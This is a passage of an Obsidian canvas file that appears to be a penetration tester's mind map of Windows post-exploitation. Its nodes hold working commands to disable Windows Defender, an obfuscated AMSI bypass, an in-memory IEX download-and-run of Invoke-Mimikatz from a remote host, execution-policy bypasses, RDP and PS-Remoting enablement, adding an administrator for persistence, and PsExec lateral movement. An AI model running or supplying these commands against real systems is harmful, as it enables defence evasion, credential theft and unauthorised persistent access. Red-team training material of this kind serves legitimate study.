		{"type":"text","text":"```powershell\n.\\PsExec.exe \\\\<HOSTNAME> cmd\n```","id":"9d6286749327158b","x":4087,"y":1100,"width":374,"height":60},
		{"type":"text","text":"```powershell\n$sess = New-PSSession -ComputerName <HOST>\n```","id":"fe2b4f5eeaaf4c20","x":4087,"y":1180,"width":544,"height":60},
		{"type":"text","text":"```powershell\n$sess = New-PSSession -ComputerName <HOST>\n```","id":"9ad921a91c563ac8","x":4087,"y":1260,"width":546,"height":60},
		{"type":"text","text":"```powershell\nSet-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus\n```","id":"d26ab937343b0f07","x":937,"y":120,"width":866,"height":60},
		{"type":"text","text":"```powershell\nSet-MpPreference -DisableIOAVProtection $true\n```","id":"eaacb8a3f9c78f68","x":1091,"y":211,"width":558,"height":60},
		{"type":"text","text":"```powershell\nImport-Module .\\PowerView.ps1\n```","id":"98d497bd6d458fe0","x":943,"y":-271,"width":427,"height":60},
		{"type":"text","text":"```powershell\n. .\\PowerUp.ps1\n```","id":"337c9cd874758dff","x":943,"y":-191,"width":427,"height":60},
		{"type":"text","text":"Import Local file ","id":"59294c93cdca22bb","x":560,"y":-221,"width":291,"height":60},
		{"type":"text","text":"Import in memory\n**To Avoid firewall and AV**","id":"08cf2172b00bc8cc","x":560,"y":-17,"width":291,"height":78},
		{"type":"text","text":"```powershell\npowershell.exe -nop -exec bypass \"IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')\"\n```","id":"83a08a88a63e48b8","x":943,"y":-8,"width":1117,"height":60},
		{"type":"text","text":"AMSI","id":"d7375bf32a4c97fc","x":560,"y":-410,"width":160,"height":60},
		{"type":"text","text":"Security Bypass","id":"0073f0c4e8080e37","x":200,"y":-540,"width":250,"height":60},
		{"type":"text","text":"Importing your modules","id":"9b8fae862b7ec0ce","x":200,"y":-131,"width":250,"height":78},
		{"type":"text","text":"Gained access","id":"3f3428d75be63f23","x":-200,"y":-122,"width":250,"height":60},
		{"type":"text","text":"```powershell\nS`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  \"{1}{0}\"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  ).\"A`ss`Embly\".\"GET`TY`Pe\"((  \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) ).\"g`etf`iElD\"(  ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  )).\"sE`T`VaLUE\"(  ${n`ULl},${t`RuE} )\n```","id":"3dbe75f6427616ff","x":1129,"y":-470,"width":1040,"height":180},
		{"type":"text","text":"AMSI Bypass PowerShell Command","id":"2ebb0aea5a71e8d9","x":786,"y":-425,"width":250,"height":90},
		{"type":"text","text":"Have reverse shell?","id":"72fa4c680da4f8fa","x":560,"y":-1398,"width":250,"height":60},
		{"type":"text","text":"Persistence","id":"c1dfbcb7aa6b089b","x":560,"y":-1232,"width":250,"height":60},
		{"type":"text","text":"Add user to local Administrators","id":"04ab6ee9d3e91818","x":884,"y":-1232,"width":356,"height":60},
		{"type":"text","text":"```cmd\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n```","id":"7bf5ea18cd0697b3","x":1120,"y":-1400,"width":683,"height":120},
		{"type":"text","text":"```cmd\nnet localgroup Administrators <Domain\\USER> /add\n```","id":"b120c0537d88aef5","x":1280,"y":-1232,"width":523,"height":60},
		{"type":"text","text":"Enable RDP","id":"ca47594846faab2a","x":911,"y":-1370,"width":169,"height":60},
		{"type":"text","text":"ADMINISTRATOR\nor\n`nt authority\\system  `","id":"0607fa2eab973b4f","x":200,"y":-1338,"width":250,"height":128},
		{"type":"text","text":"Enable PS-Remoting","id":"b2e391ddcc6a37e6","x":920,"y":-1480,"width":250,"height":60},
		{"type":"text","text":"```powershell\nPowershell -ep bypass Enable-PSRemoting -force\n```","id":"7fd001ac23fe2714","x":1220,"y":-1480,"width":583,"height":60},
		{"type":"text","text":"PowerShell","id":"bdc41abcb8951aba","x":560,"y":-800,"width":160,"height":60},
		{"type":"text","text":"Current Language Mode ","id":"1992ed91c6a6b684","x":830,"y":-1000,"width":301,"height":60},
		{"type":"text","text":"Execution Policy Bypass","id":"fe2c75c1d27cf8ad","x":830,"y":-690,"width":250,"height":60},
		{"type":"text","text":"```powershell\npowershel -ep bypass\n```","id":"44082a95492a3b97","x":1245,"y":-860,"width":515,"height":60},
		{"type":"text","text":"```powershell\npowershell –c <cmd>\n```","id":"a1244da42c960691","x":1245,"y":-760,"width":515,"height":60},
		{"type":"text","text":"```powershell\npowershell –ExecutionPolicy bypass\n```","id":"ca25072ea352d459","x":1245,"y":-660,"width":515,"height":60},
		{"type":"text","text":"```powershell\npowershell –encodedcommand $env:PSExecutionPolicyPreference=\"bypass\"\n```","id":"6dabce3518062f1c","x":1245,"y":-560,"width":515,"height":60},
		{"type":"text","text":"Bypassed ?","id":"ff473589e5e02407","x":1935,"y":-860,"width":250,"height":60},
		{"type":"text","text":"```powershell\n$ExecutionContext.SessionState.LanguageMode\n```","id":"0726edfb28732be0","x":1245,"y":-1000,"width":515,"height":60}
	],
	"edges":[
		{"id":"c5672ee1e279eec1","fromNode":"0077a1cb5066faad","fromSide":"right","toNode":"3f3428d75be63f23","toSide":"left"},
		{"id":"fe1cfc927d97e9dc","fromNode":"3f3428d75be63f23","fromSide":"right","toNode":"0607fa2eab973b4f","toSide":"left"},
		{"id":"964445724e4582e1","fromNode":"72fa4c680da4f8fa","fromSide":"right","toNode":"b2e391ddcc6a37e6","toSide":"left"},
		{"id":"f1004a603c1fa5c9","fromNode":"0607fa2eab973b4f","fromSide":"right","toNode":"72fa4c680da4f8fa","toSide":"left"},
		{"id":"60efe7679ef2c12a","fromNode":"72fa4c680da4f8fa","fromSide":"right","toNode":"ca47594846faab2a","toSide":"left"},
		{"id":"7a128742d1e42387","fromNode":"0607fa2eab973b4f","fromSide":"right","toNode":"c1dfbcb7aa6b089b","toSide":"left"},
		{"id":"7435db35323ff8b0","fromNode":"b2e391ddcc6a37e6","fromSide":"right","toNode":"7fd001ac23fe2714","toSide":"left"},
		{"id":"914244134492b585","fromNode":"ca47594846faab2a","fromSide":"right","toNode":"7bf5ea18cd0697b3","toSide":"left"},
		{"id":"93bfb338767c086e","fromNode":"c1dfbcb7aa6b089b","fromSide":"right","toNode":"04ab6ee9d3e91818","toSide":"left"},
		{"id":"13368ef51bdea34b","fromNode":"04ab6ee9d3e91818","fromSide":"right","toNode":"b120c0537d88aef5","toSide":"left"},
		{"id":"8808d45ca3fcbb16","fromNode":"a842f248ca7a5821","fromSide":"right","toNode":"758f1b50f0cfd060","toSide":"left"},
		{"id":"4f6d4578f46d36c3","fromNode":"a842f248ca7a5821","fromSide":"right","toNode":"05e4c295d8a91639","toSide":"left"},
		{"id":"b7416b8f11856855","fromNode":"758f1b50f0cfd060","fromSide":"right","toNode":"6dd7fdd3d44b4ebe","toSide":"left"},
		{"id":"70d6ef8fa1638976","fromNode":"05e4c295d8a91639","fromSide":"right","toNode":"158945f6370c58a4","toSide":"left"},
		{"id":"f8211bae0e09848e","fromNode":"6dd7fdd3d44b4ebe","fromSide":"right","toNode":"51fc7cc8ad1c7c50","toSide":"left"},
		{"id":"70e99430df73a222","fromNode":"6dd7fdd3d44b4ebe","fromSide":"right","toNode":"4973a82b3b265c48","toSide":"left"},
		{"id":"7fe9dc67a183e319","fromNode":"158945f6370c58a4","fromSide":"right","toNode":"3d2a557917db3541","toSide":"left"},
		{"id":"e00eda3e377e55ca","fromNode":"158945f6370c58a4","fromSide":"right","toNode":"afaccc06b3b9518d","toSide":"left"},
		{"id":"6722a8987f5925f7","fromNode":"51fc7cc8ad1c7c50","fromSide":"right","toNode":"a388c141357c54ff","toSide":"left"},
		{"id":"0d0bd260f0a65738","fromNode":"4973a82b3b265c48","fromSide":"right","toNode":"baa9f37b7a171ea7","toSide":"left"},
		{"id":"98e578d21080c56e","fromNode":"3d2a557917db3541","fromSide":"right","toNode":"7eaa47d5c522291c","toSide":"left"},
		{"id":"c23993eed2e802c7","fromNode":"afaccc06b3b9518d","fromSide":"right","toNode":"c6ca2de4915ab63b","toSide":"left"},
		{"id":"783ac6e8d4f874d4","fromNode":"3f3428d75be63f23","fromSide":"right","toNode":"a647ca71a4a59f89","toSide":"left"},
		{"id":"493787b590a8d55e","fromNode":"a647ca71a4a59f89","fromSide":"right","toNode":"efd20720b4789a34","toSide":"left"},
		{"id":"555291b1372bef35","fromNode":"efd20720b4789a34","fromSide":"right","toNode":"4eafa0fc185e0e01","toSide":"left"},
		{"id":"3fccb967612acca6","fromNode":"efd20720b4789a34","fromSide":"right","toNode":"c4cbb38f978d7cd5","toSide":"left"},
		{"id":"b4e4dcfeec980900","fromNode":"4eafa0fc185e0e01","fromSide":"right","toNode":"5058283d2c7e483e","toSide":"left"},
		{"id":"f5fdd65d6e691a99","fromNode":"c4cbb38f978d7cd5","fromSide":"right","toNode":"0d3ed392f22d0637","toSide":"left"},
		{"id":"70cf2843160d2dfe","fromNode":"3f3428d75be63f23","fromSide":"right","toNode":"9ef66571f848804c","toSide":"left"},
		{"id":"b796138613c6cc88","fromNode":"9ef66571f848804c","fromSide":"right","toNode":"8deb1a417cecd4c3","toSide":"left"},
		{"id":"3faf7d6b8589d285","fromNode":"9ef66571f848804c","fromSide":"right","toNode":"9ee76002e08886f7","toSide":"left"},
		{"id":"802b8b6d8e6e1fa9","fromNode":"8deb1a417cecd4c3","fromSide":"right","toNode":"7715dd1ac5dc2416","toSide":"left"},
		{"id":"ec2104fc0a549110","fromNode":"7715dd1ac5dc2416","fromSide":"right","toNode":"3b27051bc6e980a3","toSide":"left"},
		{"id":"152e3d1461a75299","fromNode":"9ee76002e08886f7","fromSide":"right","toNode":"bfded72faebe1105","toSide":"left"},
		{"id":"5decef575fb5c9f0","fromNode":"bfded72faebe1105","fromSide":"right","toNode":"9dc730259b2cf970","toSide":"left"},
		{"id":"b30abe6e992cfcf1","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"0bc538ecfae6d3b5","toSide":"left"},
		{"id":"7866b5051eb8f569","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"409903245dd288e4","toSide":"left"},
		{"id":"55e12514bb1722d0","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"510fe3d117fde271","toSide":"left"},
		{"id":"332b01399d6e4602","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"e73c88fcee3ef5d7","toSide":"left"},
		{"id":"d0e309a202af81df","fromNode":"e73c88fcee3ef5d7","fromSide":"right","toNode":"95d23c94ed02f99d","toSide":"left"},
		{"id":"34de4b9cf62cd93c","fromNode":"95d23c94ed02f99d","fromSide":"right","toNode":"2abd98feab8ae4ea","toSide":"left"},
		{"id":"b01bc1626680e84a","fromNode":"e73c88fcee3ef5d7","fromSide":"right","toNode":"688c7565f923e56d","toSide":"left"},
		{"id":"c8c3d5f136906db3","fromNode":"9c52e83abdc8f0d6","fromSide":"right","toNode":"062b97d96407e28e","toSide":"left"},
		{"id":"b79636de9ebadcde","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"d6ea3bf45ce75629","toSide":"left"},
		{"id":"99e43267f8835327","fromNode":"062b97d96407e28e","fromSide":"right","toNode":"ea91d75b45ed4576","toSide":"left"},
		{"id":"05f79088f6150533","fromNode":"9c52e83abdc8f0d6","fromSide":"right","toNode":"22a63883b99488b5","toSide":"left"},
		{"id":"e29a6558aa9330ce","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"454abf68514db5d5","toSide":"left"},
		{"id":"fa6ee7bc1132d4ff","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"d3823a1d538abbd9","toSide":"left"},
		{"id":"bd6bad42dae755fc","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"ac7164a9f90ba40f","toSide":"left"},
		{"id":"3b87efdc32e7e827","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"892b75145cf6234f","toSide":"left"},
		{"id":"d7dc1e3e115207da","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"2f00aaf0b807e576","toSide":"left"},
		{"id":"a6c24d8a648d1c85","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"9ec1be107d0d8c52","toSide":"left"},
		{"id":"687163e28965c037","fromNode":"9ec1be107d0d8c52","fromSide":"right","toNode":"0e375ac6487d1028","toSide":"left"},
		{"id":"085531c833f44b45","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"121b8abcccc0cfbd","toSide":"left"},
		{"id":"2acdb1a699f0452e","fromNode":"22a63883b99488b5","fromSide":"right","toNode":"f1cd81a98f009729","toSide":"left"},
		{"id":"3e65e8891b94a7a6","fromNode":"f1cd81a98f009729","fromSide":"right","toNode":"b00524317a99bec9","toSide":"left"},
		{"id":"237212908b9d023c","fromNode":"f1cd81a98f009729","fromSide":"right","toNode":"5bd71e64eb3979cb","toSide":"left"},
		{"id":"16f1a31cf2bc71fd","fromNode":"9c52e83abdc8f0d6","fromSide":"right","toNode":"b7323bc0cf1657ef","toSide":"left"},
		{"id":"eff8317b6be00439","fromNode":"b7323bc0cf1657ef","fromSide":"right","toNode":"638882c6242877ee","toSide":"left"},
		{"id":"f751c6ab4b301c0f","fromNode":"a47460f14c27574b","fromSide":"right","toNode":"278d505a13584cc9","toSide":"left"},
		{"id":"57698d766bafa857","fromNode":"adb3d461f59472ba","fromSide":"right","toNode":"a47460f14c27574b","toSide":"left"},
		{"id":"b272f21f2147af25","fromNode":"adb3d461f59472ba","fromSide":"right","toNode":"cb85e6e163a79cb9","toSide":"left"},
		{"id":"cfa3e6ae1407c63f","fromNode":"cb85e6e163a79cb9","fromSide":"right","toNode":"f52451b89294661e","toSide":"left"},
		{"id":"9503bbe135f07ba5","fromNode":"f52451b89294661e","fromSide":"right","toNode":"3b8d4f155033460c","toSide":"left"},
		{"id":"620d9857cba68ecf","fromNode":"f52451b89294661e","fromSide":"right","toNode":"56ff02ba22dd1037","toSide":"left"},
		{"id":"de6b42516af1e060","fromNode":"f52451b89294661e","fromSide":"right","toNode":"748d7f0fcbab6e47","toSide":"left"},
		{"id":"83e7732dfc35ccfe","fromNode":"748d7f0fcbab6e47","fromSide":"right","toNode":"f5ec0b1dece68cee","toSide":"left"},
		{"id":"f17c392612dd607f","fromNode":"56ff02ba22dd1037","fromSide":"right","toNode":"25b05bbf95f234c3","toSide":"left"},
		{"id":"717a5565f7a9a6e6","fromNode":"3b8d4f155033460c","fromSide":"right","toNode":"899a2c945ceed1b6","toSide":"left"},
		{"id":"228ce46e80b2f9c5","fromNode":"899a2c945ceed1b6","fromSide":"right","toNode":"32802d6f9aacc6d5","toSide":"left"},
		{"id":"694f829c3a486bf9","fromNode":"899a2c945ceed1b6","fromSide":"right","toNode":"5a9ab64a3769fa73","toSide":"left"},
		{"id":"2905d2472977d3b6","fromNode":"5a9ab64a3769fa73","fromSide":"right","toNode":"f131413b4e7c588b","toSide":"left"},
		{"id":"3f2fb16eebb03e66","fromNode":"adb3d461f59472ba","fromSide":"right","toNode":"4a1d15613b0f93c4","toSide":"left"},
		{"id":"7b542ac2ec4d3b04","fromNode":"4a1d15613b0f93c4","fromSide":"right","toNode":"347a2e28bfb6bf32","toSide":"left"},
		{"id":"06fb1d195eb9bbec","fromNode":"4a1d15613b0f93c4","fromSide":"right","toNode":"4d43dfc91c46a456","toSide":"left"},
		{"id":"f52f3b41375466e5","fromNode":"4a1d15613b0f93c4","fromSide":"right","toNode":"6eddedb5c84cadad","toSide":"left"},
		{"id":"c4ad7a54d34d2f59","fromNode":"4a1d15613b0f93c4","fromSide":"right","toNode":"4382992ada97e77a","toSide":"left"},
		{"id":"094a1c8ae300bb6d","fromNode":"4382992ada97e77a","fromSide":"right","toNode":"fdb95640e81b2faa","toSide":"left"},
		{"id":"1884496a811ad433","fromNode":"4382992ada97e77a","fromSide":"right","toNode":"cad10dd899373df2","toSide":"left"},
		{"id":"8b5c3452bc90915e","fromNode":"4382992ada97e77a","fromSide":"right","toNode":"461a0eee1ee6c591","toSide":"left"},
		{"id":"e172c9f2bf963c3b","fromNode":"461a0eee1ee6c591","fromSide":"right","toNode":"6990e9d10e1c678b","toSide":"left"},
		{"id":"2f3bfe022b023202","fromNode":"4382992ada97e77a","fromSide":"right","toNode":"cdac9e84617c00aa","toSide":"left"},
		{"id":"cbaeb36f42349b18","fromNode":"cdac9e84617c00aa","fromSide":"right","toNode":"bbdfeb1a383411ba","toSide":"bottom"},
		{"id":"276024d27e4fb2c2","fromNode":"6990e9d10e1c678b","fromSide":"right","toNode":"bbdfeb1a383411ba","toSide":"left"},
		{"id":"be24dc93c3a14aaf","fromNode":"cad10dd899373df2","fromSide":"right","toNode":"bbdfeb1a383411ba","toSide":"left"},
		{"id":"af700e92a965dcbe","fromNode":"fdb95640e81b2faa","fromSide":"right","toNode":"bbdfeb1a383411ba","toSide":"top"},
		{"id":"0dca61576c73ceed","fromNode":"6eddedb5c84cadad","fromSide":"right","toNode":"50631934574a82ae","toSide":"left"},
		{"id":"6d29553087409cfe","fromNode":"50631934574a82ae","fromSide":"right","toNode":"85e74cbd9b18d444","toSide":"left"},
		{"id":"e02efb44c705a729","fromNode":"85e74cbd9b18d444","fromSide":"right","toNode":"503e9ce9f0be0063","toSide":"left"},
		{"id":"5757b3e69b73014c","fromNode":"503e9ce9f0be0063","fromSide":"right","toNode":"3c6107edd272e88e","toSide":"left"},
		{"id":"954d50d3134b2644","fromNode":"6eddedb5c84cadad","fromSide":"right","toNode":"3a41d73dd7cea161","toSide":"left"},
		{"id":"cb081e89d6ff7b2e","fromNode":"3a41d73dd7cea161","fromSide":"right","toNode":"588c6dde6faf17aa","toSide":"left"},
		{"id":"ad1e3b02135d1c99","fromNode":"3a41d73dd7cea161","fromSide":"right","toNode":"f0c636d3d10c7032","toSide":"left"},
		{"id":"78b243b99b0db62c","fromNode":"3a41d73dd7cea161","fromSide":"right","toNode":"36ef9ed319ac6aa4","toSide":"left"},
		{"id":"17014df45b536f4e","fromNode":"3c6107edd272e88e","fromSide":"right","toNode":"4155aa3abad5aba1","toSide":"left"},
		{"id":"023e01230ac11191","fromNode":"588c6dde6faf17aa","fromSide":"right","toNode":"c9d234a7c4e8ece4","toSide":"bottom"},
		{"id":"a2337040daf2bfe3","fromNode":"f0c636d3d10c7032","fromSide":"right","toNode":"c9d234a7c4e8ece4","toSide":"left"},
		{"id":"65f56517ae392a92","fromNode":"36ef9ed319ac6aa4","fromSide":"right","toNode":"c9d234a7c4e8ece4","toSide":"top"},
		{"id":"28a9d6dfdb381b07","fromNode":"4d43dfc91c46a456","fromSide":"right","toNode":"759bfd3a606e0385","toSide":"left"},
		{"id":"a18b935950c4cc51","fromNode":"347a2e28bfb6bf32","fromSide":"right","toNode":"695d9fb168bcacbc","toSide":"left"},
		{"id":"b2d0fba12ab552c1","fromNode":"347a2e28bfb6bf32","fromSide":"right","toNode":"6c6ddafe59b53aff","toSide":"left"},
		{"id":"39b7905055757eac","fromNode":"347a2e28bfb6bf32","fromSide":"right","toNode":"a1cbffb6ca3b1878","toSide":"left"},
		{"id":"c9ef56e77c32428f","fromNode":"695d9fb168bcacbc","fromSide":"right","toNode":"9657d418ab1e1b93","toSide":"bottom"},
		{"id":"d0a4b93f89a750db","fromNode":"6c6ddafe59b53aff","fromSide":"right","toNode":"9657d418ab1e1b93","toSide":"left"},
		{"id":"06c3df21a9bced46","fromNode":"a1cbffb6ca3b1878","fromSide":"right","toNode":"9657d418ab1e1b93","toSide":"top"},
		{"id":"9909849281e41f30","fromNode":"95fae785731c98c8","fromSide":"right","toNode":"4844055e043c0d47","toSide":"left"},
		{"id":"a41dde33fdd6bf82","fromNode":"95fae785731c98c8","fromSide":"right","toNode":"82a3c24f091607eb","toSide":"left"},
		{"id":"b90260844615593c","fromNode":"bbdfeb1a383411ba","fromSide":"right","toNode":"82a3c24f091607eb","toSide":"left"},
		{"id":"59a07c3d9425bfd4","fromNode":"4844055e043c0d47","fromSide":"right","toNode":"b7599deb69c6b060","toSide":"left"},
		{"id":"ecfdfc04e3ac7037","fromNode":"4844055e043c0d47","fromSide":"right","toNode":"2bc53214c0d4999c","toSide":"left"},
		{"id":"2dd5f305e6909827","fromNode":"4155aa3abad5aba1","fromSide":"right","toNode":"2bc53214c0d4999c","toSide":"left"},
		{"id":"13127c1cd99f6399","fromNode":"c9d234a7c4e8ece4","fromSide":"right","toNode":"b7599deb69c6b060","toSide":"left"},
		{"id":"8347b7433f2dcfa5","fromNode":"82a3c24f091607eb","fromSide":"right","toNode":"e1e3e05b7d3abc59","toSide":"left"},
		{"id":"54fd4d8c85b68c9c","fromNode":"e1e3e05b7d3abc59","fromSide":"right","toNode":"fe246e1e2be3af1d","toSide":"left"},
		{"id":"45d099133f9e8bb9","fromNode":"e1e3e05b7d3abc59","fromSide":"right","toNode":"97f57e6e3a1b61ca","toSide":"left"},
		{"id":"0a750356b5cf98e7","fromNode":"97f57e6e3a1b61ca","fromSide":"right","toNode":"51034cd6fe2bdada","toSide":"left"},
		{"id":"fd9e6c8aa384a8d7","fromNode":"fe246e1e2be3af1d","fromSide":"right","toNode":"da898169999526c3","toSide":"left"},
		{"id":"b6d8b15cb2722812","fromNode":"0473ffc566ba808b","fromSide":"bottom","toNode":"90e436d4ebc61d9c","toSide":"right","label":"You should move forward using this "},
		{"id":"df3f093886452ff5","fromNode":"cf4d7c289281fa7b","fromSide":"right","toNode":"8c5b1c13f7799182","toSide":"left"},
		{"id":"5c37fb46d68dcabc","fromNode":"2bc53214c0d4999c","fromSide":"right","toNode":"cf4d7c289281fa7b","toSide":"left"},
		{"id":"63925f72b09c8db2","fromNode":"89dd850306ce58ed","fromSide":"right","toNode":"fdab7601a7d16fd0","toSide":"left"},
		{"id":"8b451073cf81c9e3","fromNode":"89dd850306ce58ed","fromSide":"right","toNode":"3e7cc096cc59c0c5","toSide":"left"},
		{"id":"aaf90b10b37b3b36","fromNode":"b7599deb69c6b060","fromSide":"right","toNode":"89dd850306ce58ed","toSide":"left"},
		{"id":"7a158df87913c077","fromNode":"3e7cc096cc59c0c5","fromSide":"right","toNode":"c2dd84fa0d769d8a","toSide":"left"},
		{"id":"c16298186c322071","fromNode":"fdab7601a7d16fd0","fromSide":"right","toNode":"35ea496907458eff","toSide":"left"},
		{"id":"f72cd7306c5a2d0c","fromNode":"82a3c24f091607eb","fromSide":"right","toNode":"904d95f578d06756","toSide":"left"},
		{"id":"54be1f3a756206fe","fromNode":"904d95f578d06756","fromSide":"right","toNode":"e00455e2d87013d1","toSide":"left"},
		{"id":"410b762717963329","fromNode":"904d95f578d06756","fromSide":"right","toNode":"e8452882277ca9a0","toSide":"left"},
		{"id":"194439124f1caff8","fromNode":"855a8a360e6f67a5","fromSide":"right","toNode":"b8934ffb4c8bd270","toSide":"left"},
		{"id":"81b74b9a2f645e71","fromNode":"855a8a360e6f67a5","fromSide":"right","toNode":"5729a8602ae78bc4","toSide":"left"},
		{"id":"0eb1003f36c43651","fromNode":"b8934ffb4c8bd270","fromSide":"right","toNode":"f42470e692582858","toSide":"left"},
		{"id":"c60d49db2fc057c0","fromNode":"5729a8602ae78bc4","fromSide":"right","toNode":"af08fb2721436f3c","toSide":"left"},
		{"id":"d21464c3f0b187fd","fromNode":"e8452882277ca9a0","fromSide":"right","toNode":"b7f7eb3ad6c61a1d","toSide":"left"},
		{"id":"388b4f868451a25e","fromNode":"e8452882277ca9a0","fromSide":"right","toNode":"6a60f8fa4e34c007","toSide":"left"},
		{"id":"e5a6a797c6e02444","fromNode":"e8452882277ca9a0","fromSide":"right","toNode":"855a8a360e6f67a5","toSide":"left"},
		{"id":"dc4ff7cb701e32a5","fromNode":"e00455e2d87013d1","fromSide":"right","toNode":"f4cc5449005b5f70","toSide":"left"},
		{"id":"4e62d755622630a1","fromNode":"f4cc5449005b5f70","fromSide":"right","toNode":"c2ac992ba044b8af","toSide":"left"},
		{"id":"aed5241a4742171c","fromNode":"b7599deb69c6b060","fromSide":"right","toNode":"1e27b45ed2e771c6","toSide":"left"},
		{"id":"defcce99dc534394","fromNode":"1e27b45ed2e771c6","fromSide":"right","toNode":"505c67de23375f15","toSide":"left"},
		{"id":"3c35b7488c302b82","fromNode":"1e27b45ed2e771c6","fromSide":"right","toNode":"3fd47559136803ab","toSide":"left"},
		{"id":"1526e9fdb4036eea","fromNode":"8c5b1c13f7799182","fromSide":"top","toNode":"3fd47559136803ab","toSide":"bottom"},
		{"id":"ec007ad37408cc8d","fromNode":"3fd47559136803ab","fromSide":"right","toNode":"ece7a6289f0fb80a","toSide":"left"},
		{"id":"d4dc2da89f0d08a5","fromNode":"3fd47559136803ab","fromSide":"right","toNode":"0d148822e4211931","toSide":"left"},
		{"id":"22c071fdefd510c1","fromNode":"3fd47559136803ab","fromSide":"right","toNode":"80206330f67b434e","toSide":"left"},
		{"id":"7cb448f2259c4d62","fromNode":"505c67de23375f15","fromSide":"right","toNode":"905f8d9418e4f561","toSide":"left"},
		{"id":"b91e80b8d8827c38","fromNode":"905f8d9418e4f561","fromSide":"right","toNode":"101417f08fdebc41","toSide":"left"},
		{"id":"682d6cdd920a1f9f","fromNode":"505c67de23375f15","fromSide":"right","toNode":"dcb7655e03e617c5","toSide":"left"},
		{"id":"626c11da74c357ad","fromNode":"505c67de23375f15","fromSide":"right","toNode":"18d2f498a3d01892","toSide":"left"},
		{"id":"248682fcb43969e3","fromNode":"505c67de23375f15","fromSide":"right","toNode":"f2154382a392bf75","toSide":"left"},
		{"id":"57de07bd0ba77cbc","fromNode":"505c67de23375f15","fromSide":"right","toNode":"cc5a17fa961ee12d","toSide":"left"},
		{"id":"d64997f20a18ad08","fromNode":"505c67de23375f15","fromSide":"right","toNode":"63adde7757e219c7","toSide":"left"},
		{"id":"f2364e2a2bbe96c9","fromNode":"63adde7757e219c7","fromSide":"right","toNode":"4b719bbf1532f447","toSide":"left"},
		{"id":"3feb28586999f999","fromNode":"b7323bc0cf1657ef","fromSide":"right","toNode":"d118bcffe08bd1b3","toSide":"left"},
		{"id":"d6ef5ddb9907708d","fromNode":"d118bcffe08bd1b3","fromSide":"right","toNode":"893e1f907ec106f7","toSide":"left"},
		{"id":"2f1da7ac85151c0d","fromNode":"b7323bc0cf1657ef","fromSide":"right","toNode":"2bf059715d90d74b","toSide":"left"},
		{"id":"7c4479e15e45b191","fromNode":"b7323bc0cf1657ef","fromSide":"right","toNode":"8628997e66626c0f","toSide":"left"},
		{"id":"32e217dc1ec737b4","fromNode":"b7323bc0cf1657ef","fromSide":"right","toNode":"4652721f3f9c770d","toSide":"left"},
		{"id":"e5469a0b12fe20b9","fromNode":"2bf059715d90d74b","fromSide":"right","toNode":"9d6286749327158b","toSide":"left"},
		{"id":"677d21bf2200edc6","fromNode":"8628997e66626c0f","fromSide":"right","toNode":"fe2b4f5eeaaf4c20","toSide":"left"},
		{"id":"0ec207372a255179","fromNode":"fe2b4f5eeaaf4c20","fromSide":"right","toNode":"58460bb3c94be141","toSide":"left"},
		{"id":"982f09662349aef7","fromNode":"4652721f3f9c770d","fromSide":"right","toNode":"9ad921a91c563ac8","toSide":"left"},
		{"id":"e1b550af7be7ca4a","fromNode":"9ad921a91c563ac8","fromSide":"right","toNode":"c2ecec7aab0e635d","toSide":"left"},
		{"id":"72da279ab7963eb7","fromNode":"638882c6242877ee","fromSide":"right","toNode":"4330f173e4da17a5","toSide":"left"},
		{"id":"10b8cf6bdc9df476","fromNode":"9c52e83abdc8f0d6","fromSide":"right","toNode":"bbdd6900750a758b","toSide":"left"},
		{"id":"8d36341bc1819fc4","fromNode":"9c52e83abdc8f0d6","fromSide":"right","toNode":"10c9280ed5e79c17","toSide":"left"},
		{"id":"d8178694ac059299","fromNode":"10c9280ed5e79c17","fromSide":"right","toNode":"414fa763a3c1ccda","toSide":"left"},
		{"id":"f4a186d9586b5d5d","fromNode":"10c9280ed5e79c17","fromSide":"right","toNode":"81490e6b6e259eca","toSide":"left"},
		{"id":"e4a9faae60e0fbfc","fromNode":"81490e6b6e259eca","fromSide":"right","toNode":"da8116bbfa1382eb","toSide":"left"},
		{"id":"06868117ba541aec","fromNode":"414fa763a3c1ccda","fromSide":"right","toNode":"da8116bbfa1382eb","toSide":"left"},
		{"id":"5bdb4fb5d242d983","fromNode":"da8116bbfa1382eb","fromSide":"right","toNode":"071c10f69b542fd6","toSide":"left"},
		{"id":"29c724f671dfd1dc","fromNode":"da8116bbfa1382eb","fromSide":"right","toNode":"c4813cbc19859ff4","toSide":"left"},
		{"id":"c247e2cf5c1c068b","fromNode":"bbdd6900750a758b","fromSide":"right","toNode":"abedb97fa57f2471","toSide":"left"},
		{"id":"01c00ba4d3e6aee7","fromNode":"abedb97fa57f2471","fromSide":"right","toNode":"466025a62ca41a85","toSide":"left"},
		{"id":"597848aa4c1e0ca2","fromNode":"abedb97fa57f2471","fromSide":"right","toNode":"5161e42253c311dd","toSide":"left"},
		{"id":"d9887f86c2804778","fromNode":"bbdd6900750a758b","fromSide":"right","toNode":"bae28fef26892dc0","toSide":"left"},
		{"id":"39611dadefc9d06a","fromNode":"bbdd6900750a758b","fromSide":"right","toNode":"d34592e1e3f2c9b7","toSide":"left"},
